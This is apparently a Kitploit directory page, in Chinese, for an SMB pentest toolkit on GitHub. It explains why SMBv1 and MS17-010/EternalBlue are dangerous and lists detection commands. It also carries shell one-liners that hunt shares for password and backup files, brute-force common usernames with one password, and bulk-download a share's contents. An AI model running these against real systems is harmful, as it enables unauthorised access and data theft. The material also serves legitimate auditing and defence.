Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
smb — SMBv1:CVE-2017-0143,严重性 8.8,远程代码执行(RCE),在启用 SMBv1(ms17-010)的 Windows 上 | Kitploit
工具/GitHubGitHub/hackingyseguridad/smb
侦察密码攻击漏洞分析漏洞利用脚本与自动化信息收集网络安全渗透测试
GitHubhackingyseguridad/smb

smb

SMBv1:CVE-2017-0143,严重性 8.8,远程代码执行(RCE),在启用 SMBv1(ms17-010)的 Windows 上

查看仓库
16个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
网站

███████╗███╗ ███╗██████╗ ███║ ██╔════╝████╗ ████║██╔══██╗ ║██║ ███████╗██╔████╔██║██████╔╝ ██║ ██ ║██║ ╚════██║██║╚██╔╝██║██╔══██╗ ╚██╗ ██ ╔╝██║ ███████║██║ ╚═╝ ██║██████╔╝ ╚████╔╝ ██║ ╚══════╝╚═╝ ╚═╝╚═════╝ ╚═══╝ ╚═╝ SMB是一种网络协议,允许计算机之间共享文件、打印机和其他资源。 SMB v1(服务器消息块版本1)不安全且已过时,用于网络文件共享。

SMB v1 - 不安全!!!

  • 无加密:以明文形式传输数据,包括用户名和密码。

  • 严重漏洞:被恶意软件利用

  • WannaCry:2017年影响数百万台电脑的勒索软件。EternalBlue:由NSA开发的漏洞利用工具,用于WannaCry。

  • NotPetya:造成数十亿美元损失的恶意软件。

  • 多个已记录的漏洞(CVE-2017-0143 等)。

检测版本:

  • nxc smb 10.0.0.1
  • smbclient -L //10.0.0.1/ -m NT1
  • nmap -Pn -sVC -p 139,445 10.0.0.1 --script smb-vuln-ms17-010

其他快速命令

  • sudo mount -t cifs //10.0.0.1/Public /mnt -o guest

  • 在共享中搜索特定文件

for share in $(smbclient -L //192.168.1.100 -N 2>/dev/null | awk '/Disk/ {print $1}'); do echo "Buscando en $share:" smbclient -N //192.168.1.100/$share -c "ls pass; ls backup" 2>/dev/null done

  • 使用单一密码的简单暴力破解

for user in admin administrator guest test; do echo -n "Probando $user:password123... " smbclient -L //192.168.1.100 -U "$user%password123" 2>&1 | grep -q "session setup failed" && echo "FAIL" || echo "OK" done

  • 下载共享中的所有内容(如果有访问权限)

smbclient -U "user%pass" //192.168.1.100/ShareName -c "prompt OFF; recurse ON; mget *"

  • 快速检查 EternalBlue(无需特殊工具) echo -e "\x00\x00\x00\x90\xff\x53\x4d\x42\x25\x00" | nc -w1 192.168.1.100 445 | hexdump -C | head -5

SMBv1: 漏洞 CVE-2017-0143,严重性 8.8,远程代码执行(RCE),影响启用 SMBv1 的 Windows 系统(ms17-010)

EternalBlue 是由 NSA 创建的一个利用工具,用作网络安全工具。微软提供的官方漏洞名称为 MS17-010。此利用并非特定于 Windows 设备,而是影响任何兼容 Microsoft SMBv1 服务器协议的设备。

SMBv1

受影响的 SMBv1 版本:Microsoft Windows Vista SP2;Windows Server 2008 SP2 和 R2 SP1;Windows 7 SP1;Windows 8.1;Windows Server 2012 Gold 和 R2;Windows RT 8.1 和 Windows 10 Gold、1511 和 1607 以及 Windows Server 2016。远程攻击者可通过特制数据包执行任意代码,该漏洞也称为“Windows SMB 远程代码执行漏洞”。此漏洞不同于 CVE-2017-0144、CVE-2017-0145、CVE-2017-0146 和 CVE-2017-0148 中描述的漏洞。

https://www.exploit-db.com/exploits/41891

脚本 在:https://github.com/hackingyseguridad/smb/

| scansmbnull.sh | 检测并枚举空会话(Null Sessions)。 |

| ms08-068_tester.sh | 测试 MS08-068 漏洞(CVE-2008-4036)。 |

| scansmbghost.sh | 检测可能受 SMBGhost 影响的系统(CVE-2020-0796)。 |

| smbuserenum.sh | 通过 SMB 枚举用户。 |

| bruteinvsmb.sh | 执行反向凭据暴力破解。 |

  • 不安全配置和信息泄露:

无认证的 SMB(空会话):允许在没有凭据的情况下枚举用户、共享及其他系统信息。脚本:scansmbnull.sh、smbuserenum.sh、scansmb.sh。

  • 弱认证和暴力破解:

默认、弱或可通过直接及反向暴力破解猜测的密码。脚本:bruteinvsmb.sh(可能用于反向暴力破解),README 中的其他命令测试简单凭据。

  • 历史漏洞:

CVE-2008-4036(MS08-068):SMB 中的本地提权漏洞。脚本:ms08-068_tester.sh。CVE-2020-0796(SMBGhost):SMBv3 中的缓冲区溢出错误。脚本:scansmbghost.sh。

  • 对共享资源的未授权访问:

权限配置过高的共享(例如为“guest”提供只读或写入访问权限)。脚本:automontar.sh、smbauto.sh、smbescribefichero.sh(用于写入文件)、scansmbfile.sh(用于搜索文件)。

http://www.hackingyseguridad.com/

下载工具